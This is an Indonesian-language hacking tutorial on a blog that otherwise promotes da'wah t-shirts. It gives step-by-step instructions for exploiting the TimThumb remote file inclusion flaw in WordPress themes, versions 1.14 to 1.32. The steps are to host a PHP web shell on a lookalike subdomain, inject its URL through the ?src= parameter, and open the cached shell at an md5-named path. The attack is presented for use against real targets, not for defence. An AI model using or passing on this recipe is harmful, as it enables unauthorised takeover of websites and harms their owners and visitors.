Okeh sebelum belajar exploit ini saya mau ngejelasin bahwa timthumb ini adalah suatu bug dimana terdapat di semua website wordpress , lebih tepatnya terdapat pada " theme / tema " suatu website ,,,
Contoh : themes/optimizepress/timthumb.php < nah kalo ada bacaan seperti "

 
no image specified
Query String :
TimThumb version : 1.19 
 
berarti vuln ;) ,, nah yang harus kamu ketahui lagi itu adalah TimThumb version . 
Nah jadi target yang bisa kita exploitasi itu timthumb version 1.14 sampai dengan 
1.32 ,, Udah ngerti kan ? :) kalo belum ngerti liat aja tutorialnya :) ,, Yuk TKP .. 
 
Alat dan Bahan : 
1. Subdomain yang terintegrasi website berikut 
   : picasa.com
   : blogger.com
   : flixr.com 
 
sebenarnya ada 5 tapi aku gk hafal U,u ,, contoh " flxr.com.namawebsitekamu.com/shell.php "
, Nah sebelumnya kamu musti upload dulu shell di subdomain kamu yang letaknya di directory
public_html / httpdocs / www / dan macam² .. 
  
2. Otak dan pantang menyerah ;) .. 

Exploit : 
1. Kali ini saya dah punya target sendiri ,, lihat gambar .. 
2. Nah kemudian kalian tambahkan subdomain kalian di ahkir url seperti ini " ?src=http://www.flixr.com.subdomainkamu.com/shell.php " < begitu mas ;) ,, kurang jelas ? lihat gambar .. 
3. Tuh liat gambarnya kalo gitu dah " Game Over " namanya ;) .. tinggal buka shellnya aja kan di situ ada tulisan " Unable to open image :" kalo gitu skrng tinggal buka shellnya , caranya copy md5 yang tadi contoh :

" /cache/c89de71219ef668b7642e43e04d5d4df.php " masih kurang jelas ? liat gambar ..
4. Nah skrng kita copas ke urlnya jadi " http://namatarget.com/wp-content/themes/optimizepress/cache/c89de71219ef668b7642e43e04d5d4df.php "  , lihat di bawah ,,

5. Selesai deh :D ,,, nah itu kalo ane gk upload shell di subdomainnya tapi upload uploader aja jadi ky gitu ,,
hehe sory yak uploadernya punya pak deb~X ,,

Source : Extreme Crew
Axact

KAOS DAKWAH

KAOS DAKWAH adalah blog membahas tentang cara pembuatan Kaos Dakwah sampai bagaimana cara menjual Kaos Dakwah Online maupun offline, Silakan cari artikel di GHIRAH.COM..Terima Kasih telah berkunjung di blog sederhana ini, Jika antum PRODUSEN KAOS DAKWAH ATAU DISTRO MAU KERJASAMA SILAKAN KONTAK NO TLP YANG ADA DI WEB GHIRAH.COM

Post A Comment:

0 comments: